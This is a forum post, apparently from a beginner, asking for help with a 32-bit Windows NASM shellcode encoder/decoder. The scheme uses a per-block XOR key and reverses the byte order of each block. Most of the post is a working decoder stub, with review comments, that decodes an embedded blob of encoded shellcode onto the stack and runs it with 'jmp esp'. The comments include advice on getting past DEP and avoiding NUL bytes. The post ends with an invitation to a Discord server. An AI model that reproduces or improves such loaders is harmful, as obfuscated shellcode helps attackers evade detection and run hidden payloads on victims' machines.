
I am a novice in assembler programming, and I would appreciate it if someone could review this NASM assembler code for me. It is an encoder/decoder pair. The encoder performs the following:

    pads the shellcode with NOP (0x90) opcodes so its length is a multiple of 4 bytes
    a random key byte is generated for each 4-byte group of the shellcode and written in front of it
    the 4 bytes are stored in reverse order, each XORed with that group's key byte (5 encoded bytes per 4 original bytes)
    the process is repeated until the end-of-shellcode marker (the byte sequence 90 90 aa aa, which the decoder compares as the little-endian dword 0xaaaa9090) is reached

For those familiar with NASM assembler on Microsoft Windows: could you please check why my decoder isn't running? (As posted, the code references the labels call_shellcode, decoder, decode and execute_shellcode but never defines them, so it does not even assemble; the listing below restores them.)

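; --------------------------------------------------------------------------
; XOR / reversed-block shellcode decoder stub (32-bit x86, NASM, Intel syntax)
;
; Encoded format (from the encoder description): the payload is NOP-padded to
; a multiple of 4, then every 4-byte group is emitted as one random key byte
; followed by the 4 bytes in reverse order, each XORed with that key
; (5 encoded bytes per 4 payload bytes).  The encoded stream is terminated by
; the byte sequence 90 90 aa aa, which this code reads as the little-endian
; dword 0xaaaa9090.
;
; Runtime flow: classic jmp/call/pop to obtain the address of the encoded
; bytes, decode them block by block into a scratch area carved out of the
; stack, then `jmp esp` into the decoded code.
;
; Register roles inside the decoder:
;   esi          = start of the encoded bytes (return address of `call decoder`)
;   edx          = read offset into the encoded stream   (+5 per block)
;   eax          = write offset into the decoded buffer  (+4 per block)
;   edi          = end-of-stream marker compared against the next block
;   bl/bh/cl/ch  = the four decoded bytes of the current block
;
; NOTE(review): the posted listing referenced `call_shellcode`, `decoder`,
; `decode` and `execute_shellcode` (and exported `main`) without defining any
; of them, so it could not assemble at all.  Their positions below follow
; from the jmp/call/pop structure and the branch targets.
;
; NOTE(review): `jmp esp` executes code on the stack.  With DEP/NX enabled
; (the default for modern Windows processes) the first decoded instruction
; faults; test with DEP disabled for the process, or copy the decoded bytes
; into memory allocated as executable first.
;
; NOTE(review): there is no bounds check against the STACK_BUF scratch area.
; The embedded blob (~445 encoded bytes + marker, i.e. ~356 decoded bytes)
; fits, but the encoder should refuse payloads whose decoded size exceeds
; STACK_BUF.  The termination test also looks at the *raw encoded* bytes, so
; the encoder must verify that the marker sequence does not appear at a
; 5-byte block boundary inside the stream (random keys can produce it).
;
; Build note: when linked as a 32-bit Windows C program (e.g. MinGW gcc) the
; C entry symbol is `_main`, so `global main` / `main:` may need the
; underscore prefix; the decoder itself does not depend on the entry name.
; --------------------------------------------------------------------------

bits 32

END_MARKER   equ 0xaaaa9090        ; little-endian view of trailing 90 90 aa aa
STACK_CHUNK  equ 0x7f              ; largest sign-extended imm8 without a NUL byte
STACK_BUF    equ 4 * STACK_CHUNK   ; 508 bytes of scratch carved out below esp

global main
section .text

main:
        jmp     short call_shellcode        ; jmp/call/pop: learn the data address

decoder:
        xor     eax, eax                    ; eax = decoded-byte write offset
        xor     ebx, ebx
        xor     ecx, ecx
        xor     edx, edx                    ; edx = encoded-byte read offset
        pop     esi                         ; esi = &encoder_shellcode (pushed by call)
        mov     edi, END_MARKER
        ; four sub/imm8 instead of one sub/imm32 keeps the stub free of NUL bytes
        sub     esp, STACK_CHUNK
        sub     esp, STACK_CHUNK
        sub     esp, STACK_CHUNK
        sub     esp, STACK_CHUNK            ; esp -> STACK_BUF-byte decode area

decode:
        ; block layout: [key][b0][b1][b2][b3]; original order is b3 b2 b1 b0
        mov     bl, byte [esi + edx + 1]
        mov     bh, byte [esi + edx + 2]
        mov     cl, byte [esi + edx + 3]
        mov     ch, byte [esi + edx + 4]
        xor     bl, byte [esi + edx]        ; strip the per-block key byte
        xor     bh, byte [esi + edx]
        xor     cl, byte [esi + edx]
        xor     ch, byte [esi + edx]
        mov     byte [esp + eax],     ch    ; store reversed -> original order
        mov     byte [esp + eax + 1], cl
        mov     byte [esp + eax + 2], bh
        mov     byte [esp + eax + 3], bl

        cmp     dword [esi + edx + 5], edi  ; is the next block the end marker?
        jz      execute_shellcode

        add     edx, 5                      ; next encoded block (83 C2 05: no NULs)
        add     eax, 4                      ; next decoded slot
        jmp     short decode                ; original used jnz, which could never fall through

execute_shellcode:
        jmp     esp                         ; `short` is invalid on a register-indirect jmp

call_shellcode:
        call    decoder                     ; pushes &encoder_shellcode; popped into esi
; the posted text split one byte ("0x9" / "3") across two lines; rejoined here
encoder_shellcode: db 0x6c,0x6c,0xe3,0x84,0x90,0x74,0x45,0x14,0x74,0x74,0x41,0x13,0xca,0x25,0x93,0x7d,0x71,0x2f,0xf6,0x4d,0x9c,0x15,0x88,0xce,0x17,0xf8,0xb2,0x4f,0xf7,0x1d,0x79,0x51,0x0b,0xf2,0x5f,0x2f,0xef,0x1e,0xd0,0x1e,0x82,0xfe,0xe3,0xbe,0x2e,0x39,0xf8,0x19,0x15,0x3b,0x5a,0x9d,0x5b,0x57,0x95,0x05,0x57,0xea,0x70,0x4c,0x7e,0x29,0x6e,0x2c,0xf5,0x9b,0x9a,0xa7,0xd9,0x10,0x61,0x19,0x21,0xea,0xb1,0x0f,0x43,0x7b,0xcf,0x8a,0xb4,0xfc,0x3f,0x64,0xb5,0x6d,0x35,0xe6,0x3d,0x75,0xd1,0x54,0x02,0xd0,0xf1,0xbf,0xf6,0x83,0xcb,0x76,0x5d,0x6c,0xd6,0x69,0xd6,0x26,0x17,0xf0,0x27,0xd9,0x10,0x1d,0xdf,0xd1,0xd0,0x3e,0x06,0xf9,0x3f,0x92,0x91,0x92,0x65,0xe4,0x71,0x32,0x4f,0x09,0xca,0x4f,0x83,0xdb,0x63,0xf6,0xa7,0xea,0xeb,0xce,0xb2,0x61,0x79,0x75,0xf2,0x1f,0xaa,0xd4,0xc8,0x8c,0x5f,0x9f,0x11,0x15,0x9a,0xc2,0x10,0xe5,0x6c,0x35,0xe4,0x6e,0x74,0x2f,0x50,0x50,0x30,0x43,0x19,0x1a,0x22,0x18,0x65,0x3d,0x85,0x9a,0x34,0x83,0x91,0x08,0xd9,0xdc,0x3a,0xc5,0xc5,0xba,0xd3,0x72,0x41,0x1a,0x2f,0x8d,0x0b,0x63,0x0b,0x0b,0x39,0xa7,0xf8,0x95,0xd4,0xd0,0xa6,0xd1,0xea,0xce,0xf2,0xa0,0x48,0x29,0xa7,0x86,0x0b,0x9b,0xb3,0xdb,0xf4,0xdf,0xf6,0xdf,0xdf,0xde,0x28,0x40,0x78,0x7c,0xec,0xe1,0xe1,0x8a,0x61,0xc8,0x70,0x7a,0x1a,0xa5,0x8f,0xbd,0xb7,0xaa,0x11,0xd5,0x06,0x06,0x04,0x6e,0x2e,0xc8,0x2e,0x41,0x94,0xd9,0x05,0x55,0x55,0x55,0x55,0x57,0x07,0x17,0x07,0x17,0x06,0xd9,0x09,0xec,0x6e,0xbf,0x28,0x6a,0x40,0x5f,0xb9,0xee,0xef,0xa9,0xd3,0x5a,0x2e,0xff,0xc3,0x32,0x27,0xa2,0xf2,0xd8,0x46,0xf2,0x0d,0xf8,0x86,0x32,0xc1,0x2d,0xb4,0xc9,0x8f,0x5e,0x5e,0x5e,0x39,0xb6,0x1f,0x75,0x1f,0x75,0x1f,0x51,0x39,0x06,0x07,0x55,0xbc,0xe3,0x74,0x65,0xbe,0x4c,0xb4,0xcf,0x99,0xb3,0x15,0x9e,0x23,0x6b,0x15,0x84,0xec,0xc4,0xee,0xb2,0xee,0xee,0xee,0xfe,0xee,0x6d,0x05,0x6d,0x07,0x3b,0xf6,0x13,0xa5,0x52,0xae,0xa2,0xf1,0x31,0x77,0x5d,0x3a,0x69,0x6c,0x3a,0x50,0xae,0x77,0xac,0xc6,0xf9,0x62,0xb7,0x9d,0x3d,0xaa,0x5e,0x23,0x5e,0xa6,0xdd,0x15,0x15,0x7d,0x4d,0x3d,0x0a,0x60,0x0a,0x0a,0x4a,0x94,0x9f,0xfc,0xc4,0x94,0x1a,0xe5,0x2a,0x15,0x35,0xdc,0xa9,0xb4,0x8b,0x09,0x93,0x6c,0xf2,0xde,0xfd,0x76,0x89,0x28,0x28,0xa3,0x6b,0xee,0x64,0x4f,0x67,0xa9,0x56,0x56,0x56,0xd9,0x19,0xe6,0xe6,0x82,0xf0,0x6f,0x46,0xac,0x6e,0x90,0x5e,0x9d,0x9f,0x2b,0x98,0xd3,0x71,0x66,0x23,0x68,0xec,0xbf,0xec,0x86,0xba,0xce,0x5e,0x5e,0x1b,0x31,0x90,0x90,0xaa,0xaa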




Join the Discord server; there you will find the help you need, as programmers are always exchanging programming help there.


